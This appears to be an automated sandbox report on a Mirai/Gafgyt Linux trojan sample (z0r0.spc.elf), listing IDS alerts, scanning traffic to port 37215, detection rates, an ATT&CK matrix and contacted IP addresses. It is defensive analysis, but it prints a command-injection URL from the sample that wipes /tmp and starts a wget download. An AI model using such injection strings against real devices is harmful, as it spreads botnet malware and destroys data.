              Source: unknownNetwork traffic detected: HTTP traffic on port 53808 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59206 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45962 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45498 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43392 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44756 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38446 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33372 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52182 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39106 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38084 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46136 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39882 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58884 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37408 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53142 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60658 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44320 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51914 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36714 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34228 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46172 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43770 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46244 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38406 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56908 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53742 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57584 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57810 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51350 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59772 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42752 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40758 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48720 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40464 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40954 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33820 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45738 -> 37215
              Source: /tmp/z0r0.spc.elf (PID: 5821)Queries kernel information via 'uname': Jump to behavior
              Source: z0r0.spc.elf, 5821.1.000056491f822000.000056491f8a7000.rw-.sdmp, z0r0.spc.elf, 5825.1.000056491f822000.000056491f8a7000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sparc
              Source: z0r0.spc.elf, 5821.1.00007ffe6104b000.00007ffe6106c000.rw-.sdmp, z0r0.spc.elf, 5825.1.00007ffe6104b000.00007ffe6106c000.rw-.sdmpBinary or memory string: Krx86_64/usr/bin/qemu-sparc/tmp/z0r0.spc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/z0r0.spc.elf
              Source: z0r0.spc.elf, 5821.1.000056491f822000.000056491f8a7000.rw-.sdmp, z0r0.spc.elf, 5825.1.000056491f822000.000056491f8a7000.rw-.sdmpBinary or memory string: IV!/etc/qemu-binfmt/sparc
              Source: z0r0.spc.elf, 5821.1.00007ffe6104b000.00007ffe6106c000.rw-.sdmp, z0r0.spc.elf, 5825.1.00007ffe6104b000.00007ffe6106c000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: z0r0.spc.elf, type: SAMPLE
              Source: Yara matchFile source: 5825.1.00007fad3c011000.00007fad3c023000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5821.1.00007fad3c011000.00007fad3c023000.r-x.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: Yara matchFile source: z0r0.spc.elf, type: SAMPLE
              Source: Yara matchFile source: 5825.1.00007fad3c011000.00007fad3c023000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5821.1.00007fad3c011000.00007fad3c023000.r-x.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume Access1
              OS Credential Dumping
              11
              Security Software Discovery
              Remote ServicesData from Local System11
              Non-Standard Port
              Exfiltration Over Other Network Medium1
              Service Stop
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
              Ingress Tool Transfer
              Traffic DuplicationData Destruction
              No configs have been found
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1606670 Sample: z0r0.spc.elf Startdate: 04/02/2025 Architecture: LINUX Score: 100 27 197.89.172.76, 10640, 37215 OPTINETZA South Africa 2->27 29 197.190.103.212 zain-asGH Ghana 2->29 31 99 other IPs or domains 2->31 35 Suricata IDS alerts for network traffic 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 Antivirus / Scanner detection for submitted sample 2->39 41 5 other signatures 2->41 8 z0r0.spc.elf 2->8         started        10 xfce4-panel wrapper-2.0 2->10         started        12 xfce4-panel wrapper-2.0 2->12         started        14 4 other processes 2->14 signatures3 process4 process5 16 z0r0.spc.elf 8->16         started        process6 18 z0r0.spc.elf 16->18         started        21 z0r0.spc.elf 16->21         started        23 z0r0.spc.elf 16->23         started        25 2 other processes 16->25 signatures7 33 Sample tries to kill multiple processes (SIGKILL) 18->33

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              z0r0.spc.elf65%VirustotalBrowse
              z0r0.spc.elf71%ReversingLabsLinux.Trojan.Mirai
              z0r0.spc.elf100%AviraEXP/ELF.Gafgyt.T
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches

              Download Network PCAP: filteredfull

              NameIPActiveMaliciousAntivirus DetectionReputation
              raw.igxhost.ru
              212.64.199.23
              truefalse
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+false
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://schemas.xmlsoap.org/soap/encoding/z0r0.spc.elffalse
                    high
                    http://schemas.xmlsoap.org/soap/envelope/z0r0.spc.elffalse
                      high
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      156.222.129.76
                      unknownEgypt
                      8452TE-ASTE-ASEGfalse
                      120.139.129.232
                      unknownMalaysia
                      38322WEBE-MY-AS-APWEBEDIGITALSDNBHDMYfalse
                      102.134.216.120
                      unknownSouth Africa
                      328114Comsol-Networks-ASZAfalse
                      209.228.60.42
                      unknownUnited States
                      7029WINDSTREAMUSfalse
                      216.62.129.139
                      unknownUnited States
                      7018ATT-INTERNET4USfalse
                      77.186.218.179
                      unknownGermany
                      6805TDDE-ASN1DEfalse
                      197.166.142.73
                      unknownEgypt
                      24863LINKdotNET-ASEGfalse
                      156.114.21.28
                      unknownNetherlands
                      13639ING-AMERICAS-WHOLESALEUSfalse
                      60.149.75.129
                      unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                      41.145.154.91
                      unknownSouth Africa
                      5713SAIX-NETZAfalse
                      195.167.76.20
                      unknownGreece
                      6799OTENET-GRAthens-GreeceGRfalse
                      156.141.177.69
                      unknownUnited States
                      29975VODACOM-ZAfalse
                      34.7.125.135
                      unknownUnited States
                      2686ATGS-MMD-ASUSfalse
                      156.91.128.207
                      unknownUnited States
                      10695WAL-MARTUSfalse
                      111.39.73.194
                      unknownChina
                      9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
                      199.11.196.110
                      unknownUnited States
                      3648SPRINT-BB3USfalse
                      156.80.44.43
                      unknownUnited States
                      393649BOOZ-AS2USfalse
                      34.84.161.124
                      unknownUnited States
                      15169GOOGLEUSfalse
                      184.37.225.219
                      unknownUnited States
                      5778CENTURYLINK-LEGACY-EMBARQ-RCMTUSfalse
                      17.42.88.98
                      unknownUnited States
                      714APPLE-ENGINEERINGUSfalse
                      156.83.202.11
                      unknownNetherlands
                      1103SURFNET-NLSURFnetTheNetherlandsNLfalse
                      1.48.151.110
                      unknownChina
                      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                      221.239.13.74
                      unknownChina
                      17638CHINATELECOM-TJ-AS-APASNforTIANJINProvincialNetofCTfalse
                      111.234.205.174
                      unknownJapan4685ASAHI-NETAsahiNetJPfalse
                      197.190.103.212
                      unknownGhana
                      37140zain-asGHfalse
                      4.151.164.188
                      unknownUnited States
                      3356LEVEL3USfalse
                      184.145.64.112
                      unknownCanada
                      577BACOMCAfalse
                      92.218.66.81
                      unknownGermany
                      3209VODANETInternationalIP-BackboneofVodafoneDEfalse
                      197.75.183.177
                      unknownSouth Africa
                      16637MTNNS-ASZAfalse
                      18.151.13.64
                      unknownUnited States
                      16509AMAZON-02USfalse
                      156.216.92.41
                      unknownEgypt
                      8452TE-ASTE-ASEGfalse
                      156.124.100.122
                      unknownUnited States
                      393504XNSTGCAfalse
                      155.144.201.165
                      unknownAustralia
                      1221ASN-TELSTRATelstraCorporationLtdAUfalse
                      44.183.172.98
                      unknownUnited States
                      58247NETVEILLANCEROfalse
                      197.223.37.65
                      unknownEgypt
                      37069MOBINILEGfalse
                      156.109.179.171
                      unknownUnited States
                      36081STATE-OF-COLORADO-MNT-NETWORKUSfalse
                      162.111.217.233
                      unknownUnited States
                      4196WELLSFARGO-4196USfalse
                      146.70.175.228
                      unknownUnited Kingdom
                      2018TENET-1ZAfalse
                      197.89.172.25
                      unknownSouth Africa
                      10474OPTINETZAfalse
                      41.219.166.38
                      unknownNigeria
                      37196SUDATEL-SENEGALSNfalse
                      60.168.52.200
                      unknownChina
                      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                      197.89.172.51
                      unknownSouth Africa
                      10474OPTINETZAfalse
                      172.253.94.162
                      unknownUnited States
                      15169GOOGLEUSfalse
                      47.141.204.94
                      unknownUnited States
                      5650FRONTIER-FRTRUSfalse
                      54.126.94.31
                      unknownUnited States
                      16509AMAZON-02USfalse
                      24.158.137.36
                      unknownUnited States
                      20115CHARTER-20115USfalse
                      148.97.82.182
                      unknownUnited States
                      396982GOOGLE-PRIVATE-CLOUDUSfalse
                      41.219.191.15
                      unknownNigeria
                      30998NAL-ASNGfalse
                      86.14.157.172
                      unknownUnited Kingdom
                      5089NTLGBfalse
                      31.165.131.158
                      unknownSwitzerland
                      6730SUNRISECHfalse
                      190.134.2.251
                      unknownUruguay
                      6057AdministracionNacionaldeTelecomunicacionesUYfalse
                      116.27.34.55
                      unknownChina
                      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                      142.162.160.178
                      unknownCanada
                      855CANET-ASN-4CAfalse
                      156.138.236.133
                      unknownUnited States
                      29975VODACOM-ZAfalse
                      137.160.24.77
                      unknownUnited States
                      3549LVLT-3549USfalse
                      25.1.68.69
                      unknownUnited Kingdom
                      7922COMCAST-7922USfalse
                      198.143.224.106
                      unknownUnited States
                      7029WINDSTREAMUSfalse
                      59.130.19.137
                      unknownJapan2516KDDIKDDICORPORATIONJPfalse
                      137.91.147.111
                      unknownUnited States
                      33350APS---ARIZONA-PUBLIC-SERVICE-CORPORATIONUSfalse
                      158.164.86.218
                      unknownUnited States
                      721DNIC-ASBLK-00721-00726USfalse
                      197.33.61.19
                      unknownEgypt
                      8452TE-ASTE-ASEGfalse
                      197.159.177.28
                      unknownSao Tome and Principe
                      328191CST-NET-ASSTfalse
                      123.91.142.235
                      unknownChina
                      9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                      188.50.220.239
                      unknownSaudi Arabia
                      25019SAUDINETSTC-ASSAfalse
                      121.215.179.111
                      unknownAustralia
                      1221ASN-TELSTRATelstraCorporationLtdAUfalse
                      205.95.149.12
                      unknownUnited States
                      647DNIC-ASBLK-00616-00665USfalse
                      197.117.202.172
                      unknownAlgeria
                      36947ALGTEL-ASDZfalse
                      41.27.51.173
                      unknownSouth Africa
                      29975VODACOM-ZAfalse
                      194.189.104.142
                      unknownUnited Kingdom
                      719ELISA-ASHelsinkiFinlandEUfalse
                      156.189.23.147
                      unknownEgypt
                      36992ETISALAT-MISREGfalse
                      190.93.159.252
                      unknownColombia
                      19429ETB-ColombiaCOfalse
                      60.73.107.211
                      unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                      63.97.181.2
                      unknownUnited States
                      701UUNETUSfalse
                      135.126.149.231
                      unknownUnited States
                      14962NCR-252USfalse
